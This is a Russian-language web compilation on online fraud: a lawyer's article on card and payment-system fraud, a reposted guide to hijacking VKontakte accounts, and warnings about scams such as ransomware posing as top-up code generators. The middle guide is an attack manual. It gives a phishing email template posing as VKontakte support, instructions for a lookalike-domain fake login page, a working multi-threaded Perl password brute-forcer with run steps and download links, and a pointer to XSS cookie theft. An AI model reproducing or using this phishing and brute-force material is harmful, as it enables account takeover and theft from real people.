Мошенничество в интернете.
Мошенничество в сети интернет занимает в настоящее время очень малое место в общей правоприменительной практике. Это связано с тем, что обманутые граждане зачастую не считают необходимым бороться за отнятые денежные средства. Однако, несмотря на все более и более профессиональную борьбу правоохранительных органов с различными видами мошенничества в том числе и посредством различных сетей количество их постоянно растет.
Способов, которыми пользуются аферисты множество. От общения на различного рода сайтах знакомств и последующего получения денег под различными благовидными предлогами, до прямой кражи денег с счетов. Так наиболее распространены кражи со счетов различных платежных систем WEBMONEY, Яндекс деньги и т.д. В международной паутине существует большое количество различных сайтов, оказывающих ОНЛАЙН услуги. Часть из них создана мошенниками, которые получив деньги просто исчезают, не выполняя указанные в договорах работы. Часто встречаются случаи обмана при покупке различных вещей в интернет магазинах и аукционах. Более того, в последнее время появилось множество сайтов, на которых можно найти информацию по технологии того или иного обмана, с целью получения незаконной прибыли.
Доказать, что операции по той или иной пластиковой карте совершались мошенниками можно, если привлечь специалистов в этой области. Как и в любом уголовном, гражданском деле можно представить доказательства, например отсутствия в определенное время в определенном месте собственника карты и т.д. Каждый конкретный случай необходимо рассматривать отдельно. Сложно дать рекомендации и советы по осуществлению защиты. Работа адвоката, во многом построена на изучении фактических данных, имеющихся доказательств, самой ситуации в целом. На сегодняшний день, многие уважающие себя банки возвращают деньги своим клиентам если мошеннические действия были доказаны. Однако доказывание совершения мошеннических действий с банковской картой, сложный и скрупулезный процесс, иногда требуется привлечение специалистов в области высоких технологий, экспертов в различных областях. Каждый крупный банк, крупная организация имеет в штате свою службу безопасности, которая призвана бороться с различного рода незаконными действиями с счетами клиентов. Многие банки тратят огромные средства на обеспечение электронной безопасности, устанавливая программные комплексы, различную аппаратуру, однако никто не застрахован от незаконных действий посредством проникновения через сеть интернет. Отстаивать свои права в суде представляется сложным, так как сама сфера компьютерных технологий постоянно развивается. Как развиваются приемы защиты информации, с теми же темпами развиваются различные способы их взлома. Специалисты в области защиты компьютерной информации утверждают, что примерно в течении двух недель после появления нового алгоритма защиты, появляется алгоритм взлома той или иной системы.
В России незаконный бизнес с использованием кредитных, пластиковых карт только развивается. Это вполне логично. Любая незаконная деятельность развивается с развитием различных социальных отношений. Оборот электронных денежных средств не исключение. Потерпевшими по делам о мошенничестве в сфере высоких технологий становятся все большее и большее количество людей. Нельзя не отметить, что в правоохранительных органах (в системе МВД) созданы специальные подразделения для борьбы с преступлениями в сфере высоких технологий, которые уже достигли определенных результатов.
Если Вы подверглись атаке хакеров, если Вашей фирме, организации нанесен крупный ущерб от действий недоброжелателей обращайтесь к профессиональным юристам. Правовая защита Ваших прав с помощью профессионального адвоката всегда принесет желаемый результат!
Автор: адвокат Шеметов Максим Николаевич
http://www.shemetov.ru/
Кидалы, мошенничество, лохотроны
Под мошенничеством я подразумеваю не обязательно кражу денег, но и угон паролей на мыло (не взлом, а угон).
Взлом электронной почты. У тех, кто работал в интернете, иногда появлялась необходимость взломать чужое мыло. Взломать его не так-то просто. К этому выводу обычно приходят, как только попробуют взломать. Существуют конечно поверия, что хакерские проги по взлому сайтов/форумов/мыл обычно представляют собой окно с полем ввода адреса и большой кнопкой "Hack it". И полагая все надежды на то, что есть обладатели таких прог, и которые могут сломать абсолютно любое мыло, естественно, за денюжку. Глупый заказчик перечисляет требуемую сумму, ждёт, и в результате ничего не получает. Бывает конечно, что исполнитель заказа предоставляет "доказательство" взломанного мыла - это отправка письма на ваш ящик из взломанного мыла (т.е. адресок отправителя могут любой поставить, и для этого совсем не обязательно ломать чужое мыло). Таким образом можно прислать письмо от admin@microsoft.com, сказать что я тебе подарю миллион баксов. Подробнее об этом разводе можно прочитать на сайте Игоря Белкина - www.igor-belkin.ru.
Взлом вконтакте, контакта, vkontakte.ru Введение
В данный момент очень популярны, стали соц. сети. В этой статье мы рассмотрим одну из них vkontakte.ru.
Очень много людей просят взломать страницу, из своих личных побуждений.
Над такими проектами работают профессионалы, и найти баг уже в состоявшем проекте почти нереально, но всё же редко что то всплывает и поэтому новичку, который нечего не знает, взломать будет НЕРЕАЛЬНО в любом случаи, потому что там сидят далеко не тупые люди и ни кто вам бесплатно помогать, так что смиритесь.
Для тех, кто понимает, о чём я, продолжаем.
ID это как уник. код юзера, то есть, например серийный номер машины.
Узнать его вы можете, зайдя в вконтакт, например, так выгладит ваша главная страница профиля http://vkontakte.ru/id5185**6?31892
ID получится 5185**6, то есть, то, что начинается от id и то знака ?. Если нету знака ? то идёт до конца.
Некоторые способы взлома:
1) Email + СИ -> Пишем анонимное письмо, с указанием отправителя, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо,
вам необходимо на него ответить в такой форме:
EM: Ваш email в vkontakte.ru.
PA: Ваш пароль в vkontakte.ru.
Пример:
EM: pavel_durov@mail.ru
PA: 123456
Чтоб не было путаницы, в теме письма укажите тему "Обновление".
Приносим извинения за неудобства.
".
Или типа этого, импровизируйте.
2) Фейк (обман), просто покупаете домен (к примеру, vkontaktte.ru) максимально похожий на vkontakte.ru, например разница в одной букве, и на него сливаете готовый фейк, его возьмете от сюда. vkontakte.zip [4.27 Kb] (cкачиваний: 696)
3) Email + фейк, Опять же пишем анонимное письмо, но на этот раз наша цель заманить пользователя на фейк, и чтоб он ввёл данные. Отправитель, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо.
В течение недели вам нужно зайти в систему vkontaktte.ru, и вы будите автоматически занесены, а список активных.
Приносим извинения за неудобства.
".
Или типа этого, импровизируйте.
4) Использовать брутфорсы, ищите в поисковиках, вот например брутфорс на PERL. Vkontakte.Ru Brute [FinaL]
Брутфорс акков вконтакте.ру
Сам скрипт брута (Perl):
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################
open (pass, "<$dic");
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
--------------------------------------------------------------------------------
Цитата:
--------------------------------------------------------------------------------
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
--------------------------------------------------------------------------------
Как запустить скрипт:
Цитата:
--------------------------------------------------------------------------------
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся...
6. создастся good.txt, где и будет ваш пасс.
|
Vkontakte bruteforce ©serber
vkontakte_bruteforce.rar [79.6 Kb] (cкачиваний: 1029)
или
vkontakte.exe [111.5 Kb] (cкачиваний: 958)
5) Искать уязвимости, тобишь активные XSS и SQl, для кражи кук используйте na-s.ru. Такие уязвимости очень дорого стоят, и выкладывать их нет смысла просить, тем более паблик уязвимости проживут сутки не более.
Ну, вот мы рассмотрели 5 способов как можно взломать страницу вконтакте.
Если до сих пор не поняли, не судьба :) Лучше мирно сидите там дальше вконтакте.
Сайт источник:http://www.webxakep.net
Генераторы кодов пополнения.
для интереса наберите в яндексе "генератор кодов пополнения" и посмотрите на результат. Рассказываю, что получается, если скачать и запустить такую прогу. Прога на самом деле подменяет ключи реестра, шифрует информацию с винта, и вешает систему. И при загрузке винды выводится сообщение "DANGER. Если ты хочешь, чтобы твой комп начал работать нормально без потери всех данных, вышли мне на такое-то мыло код пополнения Киевстар на 25 гривен, и в ответ ты получишь файл для восстановления компа".
Двойное пополнение счёта.
Этот лохотрон я встречаю каждый день на каждом форуме. Кроме того мне и всем моим знакомым и друзьям приходит сообщение по аське "Привет! http://mobile-secrets.uk.tt/ - тут описаны секреты украинских мобильных операторов! Общайся дольше, не переплачивай!". Наверное очень выгодно, раз такая хорошая, даже настойчивая реклама. в статейке описывается, как можно удвоить номинал карточки. Для этого надо отправить SMS со специальным текстом на специальный короткий номер. В тексте надо указать свой код пополнения, а отправить надо на номер 101 или 555. А эти номерки всего лишь являются шлюзом электронной почты, по которому лохи отправляют мошеннику свои коды пополнения. Про эти номерки мало кто знает, т.к. они нигде не обсуждаются, и мало инфы про них. Казалось бы, детям и подросткам мобилки нужны для игрушек, а взрослым для разговоров. И откуда кому знать, как отправлять СМС на электронную почту. Этим и воспользовались мошенники.
Бесплатные программы по взлому денег.
Я даю вам 100000% гарантии, что НЕ СУЩЕСТВУЕТ программ по взлому денег, которые просто так лежат на сайте для свободного скачивания. И немножко меньше гарантии 1000% - это на то, что такие программы платные, и продаются за копейки (мало ли какие критины бывают). :) Шучу. Достаточно 100%. Таких программ действительно не существует. Я видел сайт, на котором продавали генератор кодов пополнения Киевстар за 50 баксов. Самое обидное, что на это ведутся! Подумайте сами, вы парились 1000 дней и 1000 ночей над раскрытием взаимосвязи между кодом пополнения и серийным номером, сидели днями и ночами с калькулятором, различными кейгенами, переборщиками, или ещё хуже того - взламывали сервак оператора юмс или киевстара - и все, для того, чтобы получить заветный алгоритм шифрования кодов пополнения - и вдруг в один прекрасный день/ночь вы всё-таки НАШЛИ этот алгоритм, мать его так. И что вы будете делать дальше? Ну наверное вы сами себе нагенерите пару миллионов баксов на счету, а потом будете сплавлять, либо продавать коды, либо ещё че-нить. Я сомневаюсь, что вы просто так за "спасибо" положите на сервак свой Кейген для свободного скачивания, или будете продавать за 20 баксов ну или даже за 100. - чтобы лохи скачивали его, и генерили себе бабло пачками, и тратили его на, мля, тупые разговоры с такими же лохами, или заказывали примитивные тупые ГИФ-картинки 128x128 за 10 рубасов. А потом, операторы тоже не чайники, просекли бы и закрыли лавку. И все - из за таких лохов. И фиг бы кто генерил бы себе бабло.
Статья взята с сайта - www.hackersoft.ru
|
